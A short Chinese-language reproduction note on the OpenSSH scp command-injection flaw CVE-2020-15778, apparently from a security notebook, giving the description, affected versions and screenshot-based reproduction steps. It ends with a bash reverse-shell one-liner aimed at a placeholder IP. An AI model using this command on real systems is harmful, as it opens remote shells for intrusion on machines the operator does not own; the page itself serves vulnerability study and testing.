# OpenSSH 命令注入漏洞 CVE-2020-15778

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

2020年6月9日，研究人员Chinmay Pandya在Openssh中发现了一个漏洞，于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令，攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。深信服安全研究团队依据漏洞重要性和影响力进行评估，作出漏洞通告。

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

OpenSSH <= 8.3p1

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

可用于目标不允许远程登录但SCP开启的情况下远程命令执行

攻击机创建 peiqi.txt ，利用 scp上传文件 到 /tmp 目录下

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhX8qU1maofbSRl01Uv%2F-MhXBxTT-SF3CSTMF3Md%2Fimage.png?alt=media\&token=026435d3-297b-452d-96ec-cf8b6d0c6bc4)

执行命令 ping dnslog

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhX8qU1maofbSRl01Uv%2F-MhXCEps8Wi2WhI0kA6H%2Fimage.png?alt=media\&token=fa613e70-c333-4625-bee3-eac279e9970e)

反弹shell 更换命令即可

```
/bin/bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9999 0>&1
```
